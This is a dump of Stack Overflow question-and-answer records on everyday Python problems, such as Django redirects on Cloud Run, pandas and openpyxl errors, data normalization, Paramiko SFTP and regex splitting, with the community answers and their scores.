\"timestamp\": \"2023-02-13T10:21:47.296507Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/140e39f594ea8a6e074bc4435dc5a510\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.404890035Z\",\n \"spanId\": \"12869781596943932295\"\n },\n {\n \"insertId\": \"63ea0f3b00054f5971f9d391\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"718\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015427982s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"service_name\": \"stokkio-test\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"project_id\": \"stokkio\",\n \"configuration_name\": \"stokkio-test\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.347993Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/99472b16d5ee9c8a6ff9e687b43a6ca9\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.404890035Z\",\n \"spanId\": \"11202554865495003658\"\n }\n]","Title":"Django app on Cloud Run infinite redirects (301)","Tags":"python,django,docker,google-cloud-run","AnswerCount":1,"A_Id":75431802,"Answer":"Specify the valid 'ALLOWED_HOSTS' for the app from the Django 
settings; in your case the hostname will be that of the Cloud Run service you deployed. Secondly, configure the root URL 'ROOT_URLCONF' for your app.","Users Score":3,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75431371,"CreationDate":"2023-02-13 02:04:00","Q_Score":1,"ViewCount":204,"Question":"I have recently attempted to install pandas through pip. It appears to go through the process of installing pandas and all dependencies properly. I updated to the latest version through cmd as well and everything appears to work; typing in pip show pandas gives back information as expected, with the pandas version showing as 1.5.3.\nHowever, it appears that when attempting to import pandas into a project in PyCharm (I am wondering if this is where the issue lies) it gives an error stating that it can't be found. I looked through the folders to make sure the paths were correct and that pip didn't install pandas anywhere odd; it did not.\nI uninstalled Python and installed the latest version; before proceeding I would like to know if there is any reason this issue has presented itself. I looked into installing Anaconda instead but that is only compatible with Python version 3.9 or 3.1 whereas I am using the newest version, 3.11.2","Title":"pip install of pandas","Tags":"python,pandas,dataframe,machine-learning,pycharm","AnswerCount":1,"A_Id":75431477,"Answer":"When this happens to me:\n\nI reload the environment variables by running the command\nsource ~\/.bashrc\nright in the PyCharm terminal.\n\nI make sure that I have activated the correct venv (where the package installations go) by cd to path_with_venv then running\nsource ~\/pathtovenv\/venv\/bin\/activate\n\nIf that does not work, hit CMD+, to open your project settings and under Python Interpreter select the one with the venv that you have activated.
Also check if pandas appears on the list of packages that appear below the selected interpreter; if not, you may search for it and install it this way instead of via pip install.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75432346,"CreationDate":"2023-02-13 06:04:15","Q_Score":1,"ViewCount":211,"Question":"There are many normalization techniques for ML and DL. Most are known to provide normalization only from 0 to 1.\nI want to know if there are ways to normalize between -1 and 1.","Title":"Normalize -1 ~ 1","Tags":"python,machine-learning,deep-learning,data-preprocessing","AnswerCount":4,"A_Id":75432374,"Answer":"Consider re-scaling the normalized value: e.g. normalize to 0..1, then multiply by 2 and subtract 1 to have the value fall into the range of -1..1","Users Score":2,"is_accepted":false,"Score":0.0996679946,"Available Count":3},{"Q_Id":75432346,"CreationDate":"2023-02-13 06:04:15","Q_Score":1,"ViewCount":211,"Question":"There are many normalization techniques for ML and DL. Most are known to provide normalization only from 0 to 1.\nI want to know if there are ways to normalize between -1 and 1.","Title":"Normalize -1 ~ 1","Tags":"python,machine-learning,deep-learning,data-preprocessing","AnswerCount":4,"A_Id":75432397,"Answer":"You can use the min-max scaler or z-score normalization; here is what you can do in sklearn\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\nor hard code it like this\nx_scaled = (x - min(x)) \/ (max(x) - min(x)) * 2 - 1 -> this one for MinMaxScaler\nx_scaled = (x - mean(x)) \/ std(x) -> this one for StandardScaler","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":3},{"Q_Id":75432346,"CreationDate":"2023-02-13 06:04:15","Q_Score":1,"ViewCount":211,"Question":"There are many normalization techniques for ML and DL.
Most of them are known to normalize only to the range 0 to 1.\nI want to know whether there are ways to normalize to the range -1 to 1.","Title":"Normalize -1 ~ 1","Tags":"python,machine-learning,deep-learning,data-preprocessing","AnswerCount":4,"A_Id":75432401,"Answer":"Yes, there are ways to normalize data to the range between -1 and 1. One common method is called Min-Max normalization. It works by transforming the data to a new range, such that the minimum value is mapped to -1 and the maximum value is mapped to 1. The formula for this normalization is:\nx_norm = (x - x_min) \/ (x_max - x_min) * 2 - 1\nwhere x_norm is the normalized value, x is the original value, x_min is the minimum value in the data and x_max is the maximum value in the data.\nAnother common method is Z-score normalization, also known as standard score normalization. This method normalizes the data by subtracting the mean and dividing by the standard deviation. The formula for this normalization is:\nx_norm = (x - mean) \/ std\nwhere x_norm is the normalized value, x is the original value, mean is the mean of the data and std is the standard deviation of the data. Note, however, that Z-score normalization does not guarantee that values fall within the range -1 to 1.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":3},{"Q_Id":75432923,"CreationDate":"2023-02-13 07:24:28","Q_Score":1,"ViewCount":167,"Question":"I am using AWS CodeBuild to execute my test suite. It says 'permission denied' when I try to run allure generate in AWS CodeBuild.\nPlease share the solution if anyone knows how to generate an Allure report while working with AWS CodeBuild.\nI am using pytest and the scenario works fine locally. 
But it fails in AWS, as the AWS build does not allow me to run the allure generate command.\nOn successful dev deployment --> test suite execution --> generate Allure reports --> upload them to S3 --> send the report via email using AWS SNS with Lambda.\nAll of the above steps work fine except the 3rd step (allure generate).\nPlease share the solution if anyone knows how to do it.","Title":"How to run allure generate command while using aws code build","Tags":"python,amazon-web-services,pytest,allure","AnswerCount":1,"A_Id":75457422,"Answer":"I was able to fix this by downloading the Allure package freshly outside of $CODEBUILD_SRC_DIR and setting the PATH to that location.\n(Initially I made this part of the test repository itself and added that location to PATH, which did not work.)","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75433141,"CreationDate":"2023-02-13 07:54:12","Q_Score":1,"ViewCount":590,"Question":"I am expecting multiple data types as input to a function & want to take a specific action if it's a pydantic model (a pydantic model here means class StartReturnModel(BaseModel)).\nIn the case of a model instance I can check it using isinstance(model, StartReturnModel) or isinstance(model, BaseModel) to identify that it's a pydantic model instance.\nBased on the below test program I can see that type(StartReturnModel) returns ModelMetaclass. Can I use this to identify a pydantic model? 
Or is there any better way to do it?\nfrom pydantic import BaseModel\nfrom pydantic.main import ModelMetaclass\nfrom typing import Optional\n\nclass StartReturnModel(BaseModel):\n result: bool\n pid: Optional[int]\n\nprint(type(StartReturnModel))\nprint(f\"is base model: {bool(isinstance(StartReturnModel, BaseModel))}\")\nprint(f\"is meta model: {bool(isinstance(StartReturnModel, ModelMetaclass))}\")\n\nres = StartReturnModel(result=True, pid=500045)\nprint(f\"\\n{type(res)}\")\nprint(f\"is start model(res): {bool(isinstance(res, StartReturnModel))}\")\nprint(f\"is base model(res): {bool(isinstance(res, BaseModel))}\")\nprint(f\"is meta model(res): {bool(isinstance(res, ModelMetaclass))}\")\n\n*****Output****\n\nis base model: False\nis meta model: True\n\n\nis start model(res): True\nis base model(res): True\nis meta model(res): False","Title":"using isinstance on a pydantic model","Tags":"python,pydantic","AnswerCount":2,"A_Id":75433527,"Answer":"Yes, you can use it, but why not use isinstance or issubclass?","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75433717,"CreationDate":"2023-02-13 08:54:42","Q_Score":3,"ViewCount":5094,"Question":"I am working on google colab with the segmentation_models library. It worked perfectly the first week of using it, but now it seems that I can't import the library anymore. 
Here is the error message, when I execute import segmentation_models as sm :\n---------------------------------------------------------------------------\n\nAttributeError Traceback (most recent call last)\n\n in \n 1 import tensorflow as tf\n----> 2 import segmentation_models as sm\n\n 3 frames\n\n\/usr\/local\/lib\/python3.8\/dist-packages\/efficientnet\/__init__.py in init_keras_custom_objects()\n 69 }\n 70 \n---> 71 keras.utils.generic_utils.get_custom_objects().update(custom_objects)\n 72 \n 73 \n\nAttributeError: module 'keras.utils.generic_utils' has no attribute 'get_custom_objects'\n\nColab uses tensorflow version 2.11.0.\nI did not find any information about this particular error message. Does anyone know where the problem may come from ?","Title":"module 'keras.utils.generic_utils' has no attribute 'get_custom_objects' when importing segmentation_models","Tags":"python,tensorflow,keras,image-segmentation","AnswerCount":3,"A_Id":75434944,"Answer":"Encountered the same issue sometimes. How I solved it:\n\nopen the file keras.py, change all the 'init_keras_custom_objects' to 'init_tfkeras_custom_objects'.\n\nthe location of the keras.py is in the error message. In your case, it should be in \/usr\/local\/lib\/python3.8\/dist-packages\/efficientnet\/","Users Score":4,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75433811,"CreationDate":"2023-02-13 09:03:04","Q_Score":1,"ViewCount":39,"Question":"I have created a Marklogic transform which tries to convert some URL encoded characters: [ ] and whitespace when ingesting data into database. 
This is the xquery code:\nxquery version \"1.0-ml\";\n\nmodule namespace space = \"http:\/\/marklogic.com\/rest-api\/transform\/space-to-space\";\n\ndeclare function space:transform(\n $context as map:map,\n $params as map:map,\n $content as document-node()\n ) as document-node()\n{\n\n let $puts := (\n xdmp:log($params),\n xdmp:log($context),\n map:put($context, \"uri\", fn:replace(map:get($context, \"uri\"), \"%5B+\", \"[\")),\n map:put($context, \"uri\", fn:replace(map:get($context, \"uri\"), \"%5D+\", \"]\")),\n map:put($context, \"uri\", fn:replace(map:get($context, \"uri\"), \"%20+\", \" \")),\n xdmp:log($context)\n )\n \n return $content\n \n};\n\nWhen I tried this with my python code below\ndef upload_document(self, inputContent, uri, fileType, database, collection):\n if fileType == 'XML':\n headers = {'Content-type': 'application\/xml'}\n fileBytes = str.encode(inputContent)\n elif fileType == 'TXT':\n headers = {'Content-type': 'text\/*'}\n fileBytes = str.encode(inputContent)\n else:\n headers = {'Content-type': 'application\/octet-stream'}\n fileBytes = inputContent\n\n endpoint = ML_DOCUMENTS_ENDPOINT\n params = {}\n\n if uri is not None:\n encodedUri = urllib.parse.quote(uri)\n endpoint = endpoint + \"?uri=\" + encodedUri\n\n if database is not None:\n params['database'] = database\n\n if collection is not None:\n params['collection'] = collection\n\n params['transform'] = 'space-to-space'\n\n req = PreparedRequest()\n req.prepare_url(endpoint, params)\n\n response = requests.put(req.url, data=fileBytes, headers=headers, auth=HTTPDigestAuth(ML_USER_NAME, ML_PASSWORD))\n print('upload_document result: ' + str(response.status_code))\n\n if response.status_code == 400:\n print(response.text)\n\nThe following lines are from the xquery logging:\n\n2023-02-13 16:59:00.067 Info: {}\n\n2023-02-13 16:59:00.067 Info:\n{\"input-type\":\"application\/octet-stream\",\n\"uri\":\"\/Judgment\/26856\/supportingfiles\/[TEST] 57_image1.PNG\", 
\"output-type\":\"application\/octet-stream\"}\n\n2023-02-13 16:59:00.067 Info:\n{\"input-type\":\"application\/octet-stream\",\n\"uri\":\"\/Judgment\/26856\/supportingfiles\/[TEST] 57_image1.PNG\", \"output type\":\"application\/octet-stream\"}\n\n2023-02-13 16:59:00.653 Info: Status 500: REST-INVALIDPARAM: (err:FOER0000)\nInvalid parameter: invalid uri:\n\/Judgment\/26856\/supportingfiles\/[TEST] 57_image1.PNG","Title":"Unable to create URI with whitespace in MarkLogic","Tags":"python,rest,marklogic","AnswerCount":2,"A_Id":75437482,"Answer":"The MarkLogic REST API is very opinionated about what a valid URI is, and it doesn't allow you to insert documents that have spaces in the URI. If you have an existing URI with a space in it, the REST API will retrieve or update it for you. However, it won't allow you to create a new document with such a URI.\nIf you need to create documents with spaces in the URI, then you will need to use lower-level APIs. xdmp:document-insert() will let you.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75434294,"CreationDate":"2023-02-13 09:51:55","Q_Score":1,"ViewCount":236,"Question":"I want to copy a file from my SFTP server to local computer. However, when I run my code, it didn't show any error while I still cannot find my file on local computer. My code like that:\nimport paramiko\nhost_name ='10.110.100.8'\nuser_name = 'abc'\npassword ='xyz'\nport = 22\nremote_dir_name ='\/data\/...\/PMC1087887_00003.jpg' \nlocal_dir_name = 'D:\\..\\pred.jpg'\n\nt = paramiko.Transport((host_name, port))\nt.connect(username=user_name, password=password)\nsftp = paramiko.SFTPClient.from_transport(t)\nsftp.get(remote_dir_name,local_dir_name)\n\nI have found the main problem. If I run my code in local in VS Code, it works. 
But when I login in my server by SSH in VS Code, and run my code on server, I found that my file appeared in current code folder (for example \/home\/...\/D:\\..\\pred.jpg) and its name is D:\\..\\pred.jpg. How to solve this problem if I want to run code on server and download file to local?","Title":"Cannot copy\/move file from remote SFTP server to local machine by Paramiko code running on remote SSH server","Tags":"python,ssh,sftp,paramiko","AnswerCount":1,"A_Id":75456237,"Answer":"If you call SFTPClient.get on the server, it will, as any other file manipulation API, work with files on the server.\nThere's no way to make remote Python script directly work with files on your local machine.\nYou would have to use some API to push the files to your local machine. But for that, your local machine would have to implement the API. For example, you can run an SFTP server on the local machine and \"upload\" the files to it.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75435280,"CreationDate":"2023-02-13 11:30:20","Q_Score":2,"ViewCount":101,"Question":"I want to split this string 'AB4F2D' in ['A', 'B4', 'F2', 'D'].\nEssentially, if character is a letter, return the letter, if character is a number return previous character plus present character (luckily there is no number >9 so there is never a X12).\nI have tried several combinations but I am not able to find the correct one:\ndef get_elements(input_string):\n\n patterns = [\n r'[A-Z][A-Z0-9]',\n r'[A-Z][A-Z0-9]|[A-Z]',\n r'\\D|\\D\\d',\n r'[A-Z]|[A-Z][0-9]',\n r'[A-Z]{1}|[A-Z0-9]{1,2}'\n ]\n\n for p in patterns:\n elements = re.findall(p, input_string)\n print(elements)\n\nresults:\n['AB', 'F2']\n['AB', 'F2', 'D']\n['A', 'B', 'F', 'D']\n['A', 'B', 'F', 'D']\n['A', 'B', '4F', '2D']\n\nCan anyone help? 
Thanks","Title":"python\/regex: match letter only or letter followed by number","Tags":"python,regex","AnswerCount":2,"A_Id":75435577,"Answer":"\\D\\d?\nOne problem with yours is that you put the shorter alternative first, so the longer one never gets a chance. For example, the correct version of your \\D|\\D\\d is \\D\\d|\\D. But just use \\D\\d?.","Users Score":3,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75438826,"CreationDate":"2023-02-13 16:45:25","Q_Score":1,"ViewCount":64,"Question":"i have been trying to get speed of the vehicle using MPU-6050 but couldn't find my way to do it so,\nin the end i am stuck here\ndef stateCondition():\nwhile True:\n acc_x = read_raw_data(ACCEL_XOUT_H)\n acc_y = read_raw_data(ACCEL_YOUT_H)\n acc_z = read_raw_data(ACCEL_ZOUT_H)\n gyro_x = read_raw_data(GYRO_XOUT_H)\n gyro_y = read_raw_data(GYRO_YOUT_H)\n gyro_z = read_raw_data(GYRO_ZOUT_H)\n # Full scale range +\/- 250 degree\/C as per sensitivity scale factor\n Ax = acc_x\/16384.0\n Ay = acc_y\/16384.0\n Az = acc_z\/16384.0\n Gx = gyro_x\/131.0\n Gy = gyro_y\/131.0\n Gz = gyro_z\/131.0\n\ncan some one please write the rest of it so that it returns the speed of the vehicle in km\/hr or whatever it is!!!!!\nThank you","Title":"Detect the speed of the vehicle using MPU6050","Tags":"python,raspberry-pi,gyroscope,mpu6050","AnswerCount":1,"A_Id":75472650,"Answer":"An MPU6050 will provide you with information about changes in motion (acceleration or decelleration mostly, but also curves). It will not provide you with absolute values. That can only be achieved by integrating over time, but this requires a known start position\/speed. 
Also, it is very inexact, particularly with cheap motion sensors such as this one.\nTo get the speed of a vehicle, it is much easier to use a GNSS module instead.","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75439849,"CreationDate":"2023-02-13 18:24:22","Q_Score":1,"ViewCount":65,"Question":"The code below probably works (no errors present):\nviews.py\nclass SignInView(View):\n\n def get(self, request):\n return render(request, \"signin.html\")\n\n def post(self, request):\n user = request.POST.get('username', '')\n pwd = request.POST.get('password', '')\n\n user = authenticate(username=user, password=pwd)\n\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect('\/')\n else:\n return HttpResponse(\"Bad user.\")\n else:\n return HttpResponseRedirect('\/')\n\n....but in the template:\n{% user.is_authenticated %}\n\nis not True. So I don't see any functionality for an authenticated user.\nWhat is the problem?","Title":"Django - after sign-in the template doesn't know that the user is authenticated","Tags":"python,django,django-views,django-templates,django-authentication","AnswerCount":2,"A_Id":75439899,"Answer":"You should do it like {% if request.user.is_authenticated %} or {% if user.is_authenticated %}","Users Score":1,"is_accepted":false,"Score":0.0996679946,"Available Count":1},{"Q_Id":75440354,"CreationDate":"2023-02-13 19:20:26","Q_Score":12,"ViewCount":6906,"Question":"This bug suddenly came up literally today after read_excel previously was working fine. 
Fails no matter which version of python3 I use - either 10 or 11.\nDo folks know the fix?\n File \"\/Users\/aizenman\/My Drive\/code\/daily_new_clients\/code\/run_daily_housekeeping.py\", line 38, in \n main()\n File \"\/Users\/aizenman\/My Drive\/code\/daily_new_clients\/code\/run_daily_housekeeping.py\", line 25, in main\n sb = diana.superbills.load_superbills_births(args.site, ath)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Users\/aizenman\/My Drive\/code\/daily_new_clients\/code\/diana\/superbills.py\", line 148, in load_superbills_births\n sb = pd.read_excel(SUPERBILLS_EXCEL, sheet_name=\"Births\", parse_dates=[\"DOS\", \"DOB\"])\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/util\/_decorators.py\", line 211, in wrapper\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/util\/_decorators.py\", line 331, in wrapper\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_base.py\", line 482, in read_excel\n io = ExcelFile(io, storage_options=storage_options, engine=engine)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_base.py\", line 1695, in __init__\n self._reader = self._engines[engine](self._io, storage_options=storage_options)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_openpyxl.py\", line 557, in __init__\n super().__init__(filepath_or_buffer, storage_options=storage_options)\n File 
\"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_base.py\", line 545, in __init__\n self.book = self.load_workbook(self.handles.handle)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_openpyxl.py\", line 568, in load_workbook\n return load_workbook(\n ^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/openpyxl\/reader\/excel.py\", line 346, in load_workbook\n reader.read()\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/openpyxl\/reader\/excel.py\", line 303, in read\n self.parser.assign_names()\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/openpyxl\/reader\/workbook.py\", line 109, in assign_names\n sheet.defined_names[name] = defn\n ^^^^^^^^^^^^^^^^^^^\nAttributeError: 'ReadOnlyWorksheet' object has no attribute 'defined_names'","Title":"Why does pandas read_excel fail on an openpyxl error saying 'ReadOnlyWorksheet' object has no attribute 'defined_names'?","Tags":"python,pandas,openpyxl","AnswerCount":3,"A_Id":75527773,"Answer":"By installing the 'xlxswriter', the trouble was solved. Thanks to the above solutions, but they do not work in my case. So, this maybe another issuse you may consider.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75440354,"CreationDate":"2023-02-13 19:20:26","Q_Score":12,"ViewCount":6906,"Question":"This bug suddenly came up literally today after read_excel previously was working fine. 
Fails no matter which version of python3 I use - either 10 or 11.\nDo folks know the fix?\n File \"\/Users\/aizenman\/My Drive\/code\/daily_new_clients\/code\/run_daily_housekeeping.py\", line 38, in \n main()\n File \"\/Users\/aizenman\/My Drive\/code\/daily_new_clients\/code\/run_daily_housekeeping.py\", line 25, in main\n sb = diana.superbills.load_superbills_births(args.site, ath)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Users\/aizenman\/My Drive\/code\/daily_new_clients\/code\/diana\/superbills.py\", line 148, in load_superbills_births\n sb = pd.read_excel(SUPERBILLS_EXCEL, sheet_name=\"Births\", parse_dates=[\"DOS\", \"DOB\"])\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/util\/_decorators.py\", line 211, in wrapper\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/util\/_decorators.py\", line 331, in wrapper\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_base.py\", line 482, in read_excel\n io = ExcelFile(io, storage_options=storage_options, engine=engine)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_base.py\", line 1695, in __init__\n self._reader = self._engines[engine](self._io, storage_options=storage_options)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_openpyxl.py\", line 557, in __init__\n super().__init__(filepath_or_buffer, storage_options=storage_options)\n File 
\"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_base.py\", line 545, in __init__\n self.book = self.load_workbook(self.handles.handle)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/pandas\/io\/excel\/_openpyxl.py\", line 568, in load_workbook\n return load_workbook(\n ^^^^^^^^^^^^^^\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/openpyxl\/reader\/excel.py\", line 346, in load_workbook\n reader.read()\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/openpyxl\/reader\/excel.py\", line 303, in read\n self.parser.assign_names()\n File \"\/Library\/Frameworks\/Python.framework\/Versions\/3.11\/lib\/python3.11\/site-packages\/openpyxl\/reader\/workbook.py\", line 109, in assign_names\n sheet.defined_names[name] = defn\n ^^^^^^^^^^^^^^^^^^^\nAttributeError: 'ReadOnlyWorksheet' object has no attribute 'defined_names'","Title":"Why does pandas read_excel fail on an openpyxl error saying 'ReadOnlyWorksheet' object has no attribute 'defined_names'?","Tags":"python,pandas,openpyxl","AnswerCount":3,"A_Id":75449213,"Answer":"You can first try to uninstall the openpyxl\npip uninstall openpyxl -y\nand then use\npip install openpyxl==3.1.0 -y\nNote: Use ! infront of code if case of using notebooks.\n!pip uninstall openpyxl -y\n!pip install openpyxl==3.1.0 -y\nIf the above code does not work. You can try to upgrade the pandas. 
i.e\n!pip uninstall pandas -y && !pip install pandas","Users Score":1,"is_accepted":false,"Score":0.0665680765,"Available Count":2},{"Q_Id":75440385,"CreationDate":"2023-02-13 19:24:07","Q_Score":1,"ViewCount":122,"Question":"I am trying to load data into a custom NER model using spacy, I am getting an error:-\n'RobertaTokenizerFast' object has no attribute '_in_target_context_manager'\nhowever, it works fine with the other models.\nThank you for your time!!","Title":"'RobertaTokenizerFast' object has no attribute '_in_target_context_manager' error while loading data into custom NER model","Tags":"python,spacy,named-entity-recognition","AnswerCount":1,"A_Id":75515376,"Answer":"I faced the same issue after upgrading my environment from {Python 3.9 + Spacy 3.3} to {Python 3.10 + Space 3.5}. Resolved this by upgrading and re-packaging the model.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75444318,"CreationDate":"2023-02-14 06:50:01","Q_Score":1,"ViewCount":138,"Question":"i wrote a basic python program and tried running it using the play button but nothing happens,\ni look through the interpreters and the one for python isnt detected\ncan someone guide me\ntried looking online for answers but most are confusing since i can't seem to find some of the settings they are recommending i use","Title":"Python file won't run in vs code using play button","Tags":"python-3.x,visual-studio-code","AnswerCount":1,"A_Id":75444459,"Answer":"Hey, my suggestion would be :\n\nFirst check the installation of python on your machine, and if it\ndoesn't help then,\nOpen keyboard shortcuts in VS Code 'CTRL + K and CTRL + S' or by\nclicking settings button in bottom-left corner.\nSearch \"Run Python File in Terminal\".\nYou will get first option with the same title.\nDouble click the Key Binding area in front of title.\nAnd set a keyboard shortcut for running Python {eg: 'ALT + Q' (My shortcut)}. 
This would be much\nconvenient.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75444637,"CreationDate":"2023-02-14 07:32:30","Q_Score":2,"ViewCount":73,"Question":"I have a pandas data frame that looks like this:\n# df1\n Id A B C\n 3 4 5 6\n\nI wrote this to a csv and it works great the first time,\nhowever when I append the CSV it rewrites the columns and the values again\nlike this:\n Id A B C\n 3 4 5 6\n Id A B C\n 3 4 5 6\n\nIs there a method for the 2nd iteration afterwards to only write the value and not the columns when writing to a csv through pandas?\nI have tried using the 'a' command for appending and to empty my dataframe so it's just the columns to use as a header to write to the csv and then the as a separate dataframe append the values however pandas does not allow for empty dataframes","Title":"How to write to a CSV file with pandas while appending to the next empty row without writing the columns again?","Tags":"python,pandas,csv","AnswerCount":2,"A_Id":75444673,"Answer":"Set header=False option for each next df.to_csv call to exclude column names from record.","Users Score":2,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75447782,"CreationDate":"2023-02-14 12:23:38","Q_Score":1,"ViewCount":152,"Question":"I have a problem (that I think I'm over complicating) but for the life of me I can't seem to solve it.\nI have 2 dataframes. One containing a list of items with quantities that I want to buy. I have another dataframe with a list of suppliers, unit cost and quantity of items available. 
Along with this I have a dataframe with shipping cost for each supplier.\nI want to find the optimal way to break up my order among the suppliers to minimise costs.\nSome added points:\n\nSuppliers won't always be able to fulfil the full order of an item so I want to also be able to split an individual item among suppliers if it is cheaper\nShipping only gets added once per supplier (2 items from a supplier means I still only pay shipping once for that supplier)\n\nI have seen people mention cvxpy for a similar problem but I'm struggling to find a way to use it for my problem (never used it before).\nSome advice would be great.\nNote: You don't have to write all the code for me but giving a bit of guidance on how to break down the problem would be great.\nTIA","Title":"How would I go about finding the optimal way to split up an order","Tags":"python,optimization,cvxpy,operations-research","AnswerCount":2,"A_Id":75453931,"Answer":"Some advice too large for a comment:\nAs @Erwin Kalvelagen alludes to, this problem can be described as a math program, which is probably the most common-sense approach.\nThe generalized plan of attack is to figure out how to create an expression of the problem using some modeling package and then turn that problem over to a solver engine which uses diverse techniques to find the optimal answer.\ncvxpy is certainly 1 of the options to do the first part with. I'm partial to pyomo, and pulp is also viable. pulp also installs with a solver (cbc) which is suitable for this type of problem. In other cases, you may need to install separately.\nIf you take this approach, look through a text or some online examples on how to formulate a MIP (mixed integer program). 
